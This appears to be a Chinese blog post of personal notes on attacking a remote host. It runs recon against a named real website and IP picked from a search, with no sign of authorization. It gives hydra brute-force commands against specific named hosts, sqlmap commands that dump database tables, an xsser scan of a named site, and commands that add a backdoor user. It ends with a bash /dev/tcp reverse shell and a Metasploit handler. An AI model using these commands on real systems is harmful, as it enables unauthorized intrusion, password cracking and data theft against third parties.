攻击远程主机的步骤

发表于 | 分类于
尝试攻击远程主机的一些笔记

115.238.53.131

信息收集

使用inurl:php?搜索到的一个网站

  1. 获取IP。先ping yafco.com得到IP地址115.238.53.131,也可使用nslookup,set type=A;yafco.com,还可使用dig 8.8.8.8 yafco.com
  2. 扫描端口。使用nmap扫描开放的端口nmap 115.238.53.131。msf的辅助模块use auxiliary/scanner/portscan/syn
  3. 查询个人信息。可使用whois,包括联系人、邮箱、电话、注册时间等,也可进行反查,地址whois查询
  4. 查询地理位置信息。可使用ip2location,ip2location
  5. 探索网站目录结构。在msf中使用use auxiliary/scanner/http/dir_scanner,use auxiliary/scanner/http/brute_dirs,use uxiliary/scanner/http/dir_listing
  6. 检索特定类型文件。搜索引擎搜索site:yafco.com filetype:xls
  7. 搜索邮箱。use auxiliary/gather/search_email_collector,提供邮箱后缀,可查询出大量此后缀邮箱
  8. 寻找注入点。搜索引擎搜索site:yafco.com inurl:login
  9. 操作系统识别。nmap -O -sV
  10. 服务扫描。可根据服务搜索search ****_version,如use auxiliary/scanner/telnet/telnet_version.常见服务:telnet,ssh,ftp,smb,rdp,数据库。
  11. 口令猜测。可根据服务搜索search ****_login
  12. 嗅探。use auxiliary/sniffer/psnuffle
  13. 漏洞扫描。可使用nessus,openvas,netxpose等
  14. win远程破解。需要开启3389端口,使用hydra 180.97.81.126 rdp -P /root/111弱口令.txt -l administrator -V -e ns暴力破解
  15. 暴力破解win密码hash。

渗透测试实践-侦查
子域名发掘神器:AQUATONE
经验分享|谈谈渗透测试中的信息搜集

端口

ping扫描nmap -sP 192.168.***.***
端口及服务扫描nmap -O -Pn -sS -sV 192.168.***.***
全部扫描nmap -T4 -A 192.168.***.***
快速扫描nmap -T4 -F 192.168.***.***
指定端口扫描nmap -T4 -p 8080 192.168.***.***

漏洞

Nessus
linux:service nessusd start/win:启动服务Tenable nessus
打开本机HTTPS://IP:8834
升级:nessuscli update –all
NetXpose
Owasp

工具/示例

渗透测试工具实战技巧合集

  • hydra
    暴力破解http登录密码:hydra www.idanbai.com -l admin -P /root/1800pass.txt -f -V http-post-form "/web/index.php?r=admin/public/login-exec:username=^USER^&password=^PASS^:errcode" -t 4 -vV -e ns
    ssh,mysql:hydra -l root -P /root/1800pass.txt -t 8 -e ns 172.26.1.7 ssh -vV
    hydra配置代理:export HYDRA_PROXY_HTTP=http://172.17.18.80:8080
  • sqlmap
    是否存在sql注入漏洞并扫描出所有数据库:sqlmap -r t.txt --dbs --proxy http://172.17.18.80:8080
    导出数据库表:sqlmap -r t.txt --proxy http://172.17.18.80:8080 --threads 8 --dbms mysql -D stu_ea_sx -T stu_admin_info --dumps
  • xsser
    自动检测反射性xss:xsser -u http://www.jiangkuang.com/product.asp -g ?BigClassName= -s -v --proxy=http://172.17.18.80:8080 --auto
  • Metagoofil: 一款利用Google收集信息的工具
  • dirb: 目录扫描
  • kali系统中的工具清单 - 官方介绍
  • nikto -host http://*.* 扫描指定主机的web类型,主机名。特定目录,cookie,特定cgi漏洞,xss漏洞,sql漏洞,返回主机允许的http方法等安全问题的工具。
  • zenmap图形化端口扫描工具
  • Sublister枚举子域名工具
  • angry ip scannerIP地址扫描工具
  • 超赞的恶意软件分析

其他

渗透测试总结-面经
教你一些MySQL数据库入侵及防御方法

1
2
# python -m SimpleHTTPServer
# python3 -m http.server

linux打包:tar -zcvf,解压tar -zxvf

1
2
3
4
5
# 新增用户及修改密码
useradd ri
echo -e "New201609\nNew201609" | passwd "ri"
# 删除用户及其目录
userdel -rf ri

反弹shell:

1
2
3
4
5
6
7
8
9
10
11
# 目标机执行
bash -i >& /dev/tcp/<ip>/<port> 0>&1 # 替换ip和port
# 本机msf执行
use exploit/multi/handler
set payload linux/armle/shell/reverse_tcp
set lport 6666
set lhost xxx.xxx.xxx.xxx
set exitonsession false
exploit -j
# 或本机nc执行
nc -l -p <port>